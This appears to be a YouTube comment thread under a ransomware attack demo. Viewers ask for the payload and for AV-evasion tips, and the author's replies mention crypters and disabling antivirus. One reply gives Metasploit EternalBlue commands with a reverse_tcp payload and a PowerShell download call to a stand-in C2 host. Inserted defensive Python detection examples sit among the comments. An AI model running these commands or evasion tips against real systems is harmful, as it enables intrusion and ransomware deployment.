I would like to see how the ransomware was created (for ed purposes) so I can provide a debrief to a couple clients.
🤨🤨
Yeeees clients
IKIK
There are multiple parts to the attack; the Word doc used in the first part was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Need more videos on the practical red team
You are explaining in the best way.
I request you to make more videos to learn from you
Thank you, I will
Hey mate, the Infection-Simulation document that you used to maintain the connection and to upload the malware to the victim machine, where did you get it from? (Educational purpose.) Thanks.
There are multiple parts to the attack; the Word doc used in the first part was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@lockardsecurity Would be interesting to see the document part breakdown!
@lockardsecurity What about the environment? Can we use it please?
Do you have a paid course so it's possible for us to learn step by step about this?
It's in the works, I should have more details to share in the coming weeks! Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Thank you for everything bro, have a good job.
Did this Office have macros set to auto-run? Usually you get an "enable content" message before running any type of VBS, or did you embed some shellcode in the .docx?
Hi Lockard,
Sorry, I have a few questions since I don't quite understand how you got access to the device?
- Did opening the Word document execute macros to gain access?
- And does the user have local admin rights to execute them right away?
- If it wasn't through macros, how did you get access from a different location/outside of the target network with the user only opening the Word document?
How could this be prevented?
Hello, I am working on documentation about botnets and their threats to modern institutions as part of my apprenticeship. I was wondering if you could help me set this up as part of a practical showcase for my presentation.
Kind regards,
Leon
I would thank you if you could give a link to your research with all the commands you used for the persistence part, of course just for educational purposes
I currently do not have them published publicly; that said, I'll be working on more content for the channel and will include more details and commands in the future. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Just drop all inbound connections on ports 5985 & 5986 to prevent this?
In this example, the attack is a reverse shell connection, meaning the victim's system is beaconing out to the Internet (egress). Not sure if you noticed or not, but the first connection was over TCP port 443 (HTTPS), meaning if you drop all traffic outbound over 443, you may as well disconnect from the network because nothing will work. On the second connection, the outbound port was 53 (DNS), another big issue if you try and block DNS on your network. No bind connection is being made, so I would hope and expect traffic is blocked inbound on those ports. Just know attackers (good ones) will leverage ports that MUST be open, like 53, 80, 443, to get their connections out of the network. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Which Kali tool did you use?
Is there any way you can show how to make the Word document and the actual ransomware script? As well as a list of the commands you used?
Could this be prevented by a hardware firewall?
Nice video, explanation and demonstration.
I think you should try again against a computer that has a paid antivirus license (e.g. ESET etc.).
The free version of Windows Defender has nothing with which to defend against any attack.
This is an interesting technique, and similar somehow to signed malware with a company's private signing key, typically used to backdoor whitelisted applications. Modern cyber sec is getting way more sophisticated than ever.
I was also looking for that type of videos bro 🥲
Thanks for the feedback, I use antiscan.me to test detections on the payloads, I also have the paid version of CrowdStrike I test with as well. I'll add this to the list of videos to make. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Start with the full video so I learn how to create the payload and listener
I'll be creating an updated video, full end to end, which will show the latest and greatest processes and methods.
I assume you made a backdoor first, just how do you crypt it in Kali Linux plus exploit?
It's a broken macro technique, I recommend taking the OSEP training to learn more about this method. I avoid using crypters as they are easily flagged as suspicious.
@lockardsecurity okay thanks lol
@lockardsecurity I want to learn more about hacking, can you make a Discord by any chance?
Can you make a video on how to protect from these types of attacks?
The whole process begins with opening a malicious file. Is it possible to identify the file as malicious with the default Windows Defender scan? If not, what else can a layman do to recognise which files are unsafe?
Great question, and unfortunately, as seen in this demo, Defender isn't able to detect an issue. Therefore you could do a few things:
1. Scan for malware using trusted antivirus/anti-malware tools.
2. Use VirusTotal for file analysis, www.virustotal.com is the site, Google owns them. Great way to get an idea as to what the majority of security vendors have to say about the file in question. Just know that everything uploaded to VirusTotal can be downloaded by anyone that requests it. Most folks are security researchers who work for security companies that make Anti-Virus / EDR products and use these uploads to help improve their detection logic. So the takeaway is, you don't want any classified data in a document ending up uploaded to VirusTotal. antiscan.me is a similar site and they don't submit uploads to 3rd parties like VirusTotal does.
Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
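As an added example (not code from the video or its author), here is a way to act on the advice above without the data-exposure problem: hash the document locally and look the hash up on VirusTotal, which consults existing reports without uploading the file, and inspect the document package itself for a VBA project or embedded objects, which a plain .docx should never contain. The sample documents are constructed in memory; the lookup URL is VirusTotal's public per-file report page keyed by hash.

```python
"""Local pre-checks for a suspicious Office document (added example, not from the video).
Hash the file and look the hash up on VirusTotal instead of uploading the document,
and inspect the OOXML package for a VBA project or embedded objects."""
import hashlib
import io
import zipfile

MACRO_PART = "word/vbaProject.bin"        # present only when the document carries VBA macros
EMBEDDING_PREFIX = "word/embeddings/"     # OLE/packager objects embedded in the document


def file_hashes(data: bytes) -> dict:
    """MD5, SHA-1 and SHA-256 of the file; any of them can be searched on VirusTotal."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def virustotal_lookup_url(sha256: str) -> str:
    """Per-file report page keyed by hash: looking this up does not upload the document."""
    return f"https://www.virustotal.com/gui/file/{sha256}"


def inspect_office_document(data: bytes) -> dict:
    """Report whether an OOXML Word package contains a VBA project or embedded objects.
    A plain .docx should contain neither; a vbaProject.bin part means macros are present
    regardless of what the file extension says."""
    result = {"is_ooxml": False, "has_vba_project": False, "embedded_objects": []}
    if not data.startswith(b"PK"):
        return result  # not a zip container (legacy OLE .doc, or not an Office file at all)
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return result
    result["is_ooxml"] = "[Content_Types].xml" in names
    result["has_vba_project"] = MACRO_PART in names
    result["embedded_objects"] = [n for n in names if n.startswith(EMBEDDING_PREFIX)]
    return result


def build_sample_docx(with_macro: bool, with_embedding: bool = False) -> bytes:
    """Construct a minimal OOXML-shaped package in memory (test data, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr(MACRO_PART, b"\xd0\xcf\x11\xe0")  # OLE magic, as in a real vbaProject.bin
        if with_embedding:
            zf.writestr(EMBEDDING_PREFIX + "oleObject1.bin", b"\xd0\xcf\x11\xe0")
    return buf.getvalue()


def triage(data: bytes) -> dict:
    """Combine the checks into one verdict a user can act on before opening the file."""
    info = inspect_office_document(data)
    sha256 = file_hashes(data)["sha256"]
    reasons = []
    if info["has_vba_project"]:
        reasons.append("contains VBA project (macros)")
    if info["embedded_objects"]:
        reasons.append(f"contains {len(info['embedded_objects'])} embedded object(s)")
    return {"sha256": sha256, "lookup": virustotal_lookup_url(sha256),
            "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, doc in (("clean", build_sample_docx(False)),
                       ("macro", build_sample_docx(True))):
        print(label, triage(doc))
```

The structural check is a first filter, not a verdict: a document with no VBA project can still be dangerous (external template links, exploits in the parser), and a hash with no VirusTotal report only means nobody has submitted that exact file yet.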
@lockardsecurity thank you for taking the time, this was very informative.
Can you make a tutorial on how to create such ransomware? (Love your content)
lol
I've kicked around a few ideas and yes there will be future videos to come on not just how to make them, but also how to evade detections from all the big name security tools.
@lockardsecurity guess we will wait
Thanks for this demo. One question please, if the user is not a local admin and is unable to run the file after clicking, will the hack still be successful?
Hi, I'm sorry for the delayed response as I'm just now seeing your question. A non-admin user would still be able to open this file. In doing so the malicious code would still run, however it would be in the context of the user's permissions. When this happens, the attacker must do a privilege escalation attack to get admin / root access.
Hey! It's an absolutely amazing video, but how can I get this code for my ransomware project? Can u reply pls.
Hello, I wanted to simulate the above attack for a college project, can anyone help me?
Sir, can I have a copy of that simulation? For educational purposes, I'm into cybersec right now.
What kind of mail are you using? How can I use it? Is it free?
Is it tempmail?
In that example it was Mailinator.
Do you have a video where you put the malicious code into the macro file? Thank you
Hi, I'm sorry for the delayed response as I'm just now seeing your question. No I do not, the main reason for that is so AV vendors don't pick up some of my methods. That said, this one already is being detected, which is expected over time. I'll consider creating more videos on the entire process, start to finish, along with diving deeper into the code and methods used.
How to remove ransomware??
Same question, tried all decryption methods but they don't work 😢😢
Cause you can't, only the one who put it in the system can, which you're gonna need to pay for.
I love this video ❤
I love the video!!
Thanks for watching, please like, share and subscribe as we'll be releasing more videos like this in the near future!
Hey guys, do hackers control the ransom with a C&C server?
That's right!
How did you get access to the target's computer?
The link the victim clicked gave away the IP address, and with the IP, the hacker can basically access the victim.
@KnightMagnet so a firewall rule will block this connection?
@TK-od8hd only if the attacker IP was known beforehand and it was put in the rule
It becomes a whack-a-mole game at that point. We recommend ingesting threat intel on what are called IoCs (Indicators of Compromise), with which you can block known bad sources and destinations. However, advanced malware can be set up to talk to not just IPs but URLs, for which an attacker can easily change DNS records on the fly. They can also have multiple IPs and URLs to call out to, which makes blocking it on the firewall near impossible in some cases.
How to disable antivirus before infecting?
Each AV has its own steps to follow, most are controlled via the Registry or the running process memory space.
@lockardsecurity Ok. Windows Defender, for example, can it be disabled through the malware itself?
HI! I have been trying to simulate ransomware traffic for testing a countermeasure but I couldn't. How can I simulate wannacry ransomware traffic?
Best Regards
Each ransomware is slightly different, but also slightly similar. Great question, and I wish I could have responded sooner. I'll create a video on this topic as well. In the meantime, for WannaCry, do the following:
Tools and Steps for Simulation:
1. Set Up a Controlled Environment:
* Use a virtual lab with several Windows machines.
* Ensure the environment is completely isolated from any production networks.
2. Simulate Infection Traffic:
* Metasploit Framework: Use Metasploit to simulate the EternalBlue exploit used by WannaCry.
Load Metasploit with the EternalBlue module (bash):
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
exploit
* Emulate Ransomware Activity: Create custom scripts to simulate typical ransomware behavior without actually encrypting files.
* Create a script to mimic the creation of ransom notes, registry modifications, and dummy file encryption (rename files instead of encrypting).
* Generate network traffic to simulate command and control (C2) communication (powershell):
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadString("http://your-c2-server.com/command")
3. Monitor and Analyze Traffic:
* Use network monitoring tools like Wireshark to capture and analyze the simulated traffic.
* Verify the detection of IOCs with your security tools (SIEM, IDS/IPS).
4. Deploy Detection and Prevention Measures:
* Implement rules in your security tools to detect the IOCs listed above.
* Test the effectiveness of your security measures in detecting and responding to the simulated ransomware activity.
Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
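Step 4 of the reply above asks for detection rules, and the dummy-encryption step says to rename files rather than encrypt them. As an added example (not the reply's own script or anything from the video), here is detection logic for exactly that simulated activity, run over constructed file-activity events of the kind an EDR or Sysmon (FileCreate / rename) would record: a burst of extension-changing renames by one process, and ransom-note style filenames dropped in more than one folder. The process names, paths, timestamps and the `.locked` extension are all constructed; tune the thresholds and the note regex to whatever your simulation script actually does.

```python
"""Detection for the simulated ransomware activity (added example, not from the video or
the reply above). The simulation renames files instead of encrypting them and drops ransom
notes, so the detector looks for a burst of extension-changing renames by one process and
for note-like filenames created in more than one folder. Events, process names, paths and
the ".locked" extension are constructed to resemble EDR / Sysmon file-activity records."""
from collections import Counter, defaultdict
import ntpath
import re

# Filenames typical of ransom notes; adjust to the note name the simulation script uses.
RANSOM_NOTE_RE = re.compile(r"(readme|recover|decrypt|restore|how_to).*\.(txt|html?)$", re.I)

# Constructed events: (epoch_seconds, process, action, path, new_path_or_None).
FILE_EVENTS = [
    (1700000000 + i // 4, "sim.exe", "rename",
     f"C:\\Users\\alice\\Documents\\doc{i}.docx",
     f"C:\\Users\\alice\\Documents\\doc{i}.docx.locked")
    for i in range(12)
] + [
    (1700000004, "sim.exe", "create", "C:\\Users\\alice\\Documents\\README_RECOVER_FILES.txt", None),
    (1700000004, "sim.exe", "create", "C:\\Users\\alice\\Desktop\\README_RECOVER_FILES.txt", None),
    (1700000100, "winword.exe", "rename", "C:\\Users\\alice\\Documents\\~WRD0001.tmp",
     "C:\\Users\\alice\\Documents\\notes.docx"),
    (1700000200, "explorer.exe", "rename", "C:\\Users\\alice\\Pictures\\img1.jpeg",
     "C:\\Users\\alice\\Pictures\\img1.jpg"),
    (1700000300, "notepad.exe", "create", "C:\\Users\\alice\\Desktop\\readme.txt", None),
]


def detect_mass_rename(events, window=10, min_files=10):
    """Per process, count renames that change the extension inside a sliding time window.
    Legitimate apps rename one or two files at a time; the simulation renames dozens."""
    per_proc = defaultdict(list)
    for ts, proc, action, src, dst in events:
        if action != "rename" or dst is None:
            continue
        old_ext, new_ext = ntpath.splitext(src)[1].lower(), ntpath.splitext(dst)[1].lower()
        if old_ext != new_ext:
            per_proc[proc].append((ts, new_ext))
    alerts = {}
    for proc, items in per_proc.items():
        items.sort()
        j = 0
        for i, (ts, _) in enumerate(items):
            while j < len(items) and items[j][0] <= ts + window:
                j += 1
            if j - i >= min_files:
                exts = Counter(ext for _, ext in items[i:j])
                alerts[proc] = {"renames": j - i, "new_extension": exts.most_common(1)[0][0]}
                break
    return alerts


def detect_ransom_notes(events, min_dirs=2):
    """Flag processes that create note-like files in several directories.
    A single readme.txt from an editor stays below the directory threshold."""
    dirs_by_proc = defaultdict(set)
    for ts, proc, action, src, dst in events:
        if action == "create" and RANSOM_NOTE_RE.search(ntpath.basename(src)):
            dirs_by_proc[proc].add(ntpath.dirname(src))
    return {proc: sorted(dirs) for proc, dirs in dirs_by_proc.items() if len(dirs) >= min_dirs}


def triage(events):
    """Severity per process: both behaviours together is the ransomware pattern."""
    mass, notes = detect_mass_rename(events), detect_ransom_notes(events)
    verdicts = {}
    for proc in set(mass) | set(notes):
        if proc in mass and proc in notes:
            verdicts[proc] = "high"
        else:
            verdicts[proc] = "medium" if proc in mass else "low"
    return verdicts


if __name__ == "__main__":
    print("mass renames:", detect_mass_rename(FILE_EVENTS))
    print("ransom notes:", detect_ransom_notes(FILE_EVENTS))
    print("verdicts:", triage(FILE_EVENTS))
```

Two behaviours combined is what makes this usable in practice: a rename burst alone fires on bulk file tools and a lone readme.txt fires on every editor, but the same process doing both within seconds is the signature the simulation is meant to reproduce.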
How about if you have a DYNAMIC IP ADDRESS? Will ransomware be possible?
Yes
Yes, in this case the ransomware will act more like a worm: scan the entire network and attempt to spread to all hosts that appear to be up.
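Three replies in this thread describe traffic patterns a defender can key on: the reverse shell beaconing out over ports that must stay open (443, 53), the IoC blocklist that becomes whack-a-mole once the attacker rotates IPs and DNS records, and the worm-style scan of the whole network. As an added example (not from the video or its author), the block below runs all three detections over one constructed flow log: a static IoC match beside two behavioural checks, near-constant beacon timing and internal SMB fan-out, which catch the activity regardless of the port or destination used. Every host, destination and the IoC feed are constructed values.

```python
"""Flow-log detections (added example, not from the video): static IoC matching beside two
behavioural checks, periodic beaconing and internal fan-out, over constructed flow records.
All hosts, destinations and the IoC feed below are constructed for the example."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: "epoch_seconds src_ip dst_ip dst_port", one connection per line.
FLOW_LOG = """\
1700000000 10.0.0.5 203.0.113.10 443
1700000060 10.0.0.5 203.0.113.10 443
1700000120 10.0.0.5 203.0.113.10 443
1700000181 10.0.0.5 203.0.113.10 443
1700000240 10.0.0.5 203.0.113.10 443
1700000003 10.0.0.7 198.51.100.20 443
1700000900 10.0.0.7 198.51.100.20 443
1700001300 10.0.0.7 198.51.100.20 443
1700000010 10.0.0.5 10.0.0.11 445
1700000011 10.0.0.5 10.0.0.12 445
1700000012 10.0.0.5 10.0.0.13 445
1700000013 10.0.0.5 10.0.0.14 445
1700000014 10.0.0.5 10.0.0.15 445
1700000015 10.0.0.5 10.0.0.16 445
1700000500 10.0.0.9 192.0.2.99 53
"""

# Constructed IoC feed of known-bad destinations, as ingested from threat intel.
IOC_BLOCKLIST = {"192.0.2.99"}


def parse_flows(text):
    """Parse the log into (ts, src, dst, dport) tuples sorted by time."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            flows.append((int(ts), src, dst, int(dport)))
    return sorted(flows)


def ioc_hits(flows, blocklist):
    """Static match: only catches destinations already on the feed."""
    return [f for f in flows if f[2] in blocklist]


def detect_beacons(flows, min_events=5, max_cv=0.2):
    """Flag (src, dst, port) tuples that connect at near-constant intervals.
    The port is irrelevant: a beacon over 443 or 53 looks the same as over any other port."""
    by_tuple = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_tuple[(src, dst, dport)].append(ts)
    beacons = {}
    for key, stamps in by_tuple.items():
        if len(stamps) < min_events:
            continue
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        # Coefficient of variation: low jitter around a fixed period is the beacon signature.
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[key] = round(avg)
    return beacons


def detect_fanout(flows, port=445, window=60, min_targets=5):
    """Flag hosts reaching many distinct peers on one port inside a short window,
    the worm-style SMB spreading pattern."""
    per_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == port:
            per_src[src].append((ts, dst))
    flagged = {}
    for src, events in per_src.items():
        best, j = 0, 0
        for i, (ts, _) in enumerate(events):
            while j < len(events) and events[j][0] <= ts + window:
                j += 1
            best = max(best, len({d for _, d in events[i:j]}))
        if best >= min_targets:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    flows = parse_flows(FLOW_LOG)
    print("IoC hits:", ioc_hits(flows, IOC_BLOCKLIST))
    print("Beacons:", detect_beacons(flows))
    print("SMB fan-out:", detect_fanout(flows))
```

In the constructed log the IoC match finds only the one destination already on the feed, while the beacon check flags the 60-second heartbeat to an address the feed has never seen and the fan-out check flags the host touching six internal peers on 445 in five seconds. Real beacons add jitter, so `max_cv` is a tuning knob rather than a constant.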
It's Kali Linux
Yes, that is right!
How do you make this Word document without macros?
It's a broken macro technique. I recommend taking the OSEP training to learn more about this method.
Thank you for this video. I need your help. My laptop was exposed to a JAWR ransomware attack. I see that you are an expert in this field. I hope you can help me solve this complex problem. Thank you very much in advance.
Sorry for the delay, I'm just now seeing your comment. I hope you were able to recover from that attack. Moving forward, I'll keep a closer eye on this channel as we start to create new content.
Hi bro
If a PC is infected with a ransomware virus, how to decrypt it? Please do a video.
You can't, pay or format your PC.
How did you make it without WinDef or AV noticing or alarming? Can you tell me in 1-2 sentences how this exploit works and what I need to do? (educational purposes only)
crypter
Hi, I'm sorry for the delayed response as I'm just now seeing your question. It requires creating the payload in a way that is unique, without any suspicious indicators that would get flagged. Most crypters are easily detectable as suspicious. It requires a lot of testing, trial and error. For example, the methods I used here no longer work, therefore you have to always continue to evolve the payloads to stay one step ahead of the detection engines.
Great and informative video! I’m a cybersecurity student, and I’d love to see how you disguised this malware script as a Word document without detection. For a university project (for learning purposes), I created a Trojan that establishes a reverse shell connection between the victim and the attacker, but I couldn’t embed it in a legitimate process.
Does Kaspersky allow opening the infected Word doc at the beginning of the vid? I don't think so, so is it preventing the ransomware attack?
That probably all depends on the exploit in the doc
This doc at the time was what's known as a FUD, meaning fully undetectable. However, now just about all vendors flag it. That said, I'll be recreating this video in the near future and will be showing it against all the major AV / EDR vendors.
Bro this is so good
Thanks! Glad you enjoyed it, we'll be stepping up our response and content creation on this channel. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
I bet nobody could send me a ransomware 😂
Give me the Google Sheet documents
You don't want it :D
Hello Lord, I have a final project tomorrow, and I need to demonstrate this attack to get bonus points, I really need this. Can you help me, plsss?!!
Dang, I'm just now seeing this comment! Hope you were able to demonstrate this for your class.
Bro help me out. I'm going through the same thing
@thewickedmma hello bro can I get your attention
who would use windows ge
Very good presentation!!
This PC did not have any antivirus… if there is corporate antivirus, would this be avoided???
So you don’t go to jail, y’all, hack a VM lol
To be clear, it's my VM, and you can hack your own stuff, providing you give yourself permission to do so lol!
Damn this is so evil
Hey there, how can I get this virus??
How do you make this undetectable payload?
Instead of “hacker” you should say cyber criminal.
Generally it's hacker
True, bad actor is also on the list. But to be honest when I created this video I honestly thought it was going to be geared more toward NON security folks! How wrong was I, lol. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Hi, can I contact you pls?
Yes, you can reach out to www.lockardsecurity.com
Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@proteckdiamond solved the ransomware problem for the first time in l.G
How can I get ransomware tools? My friend is asking, for educational purposes...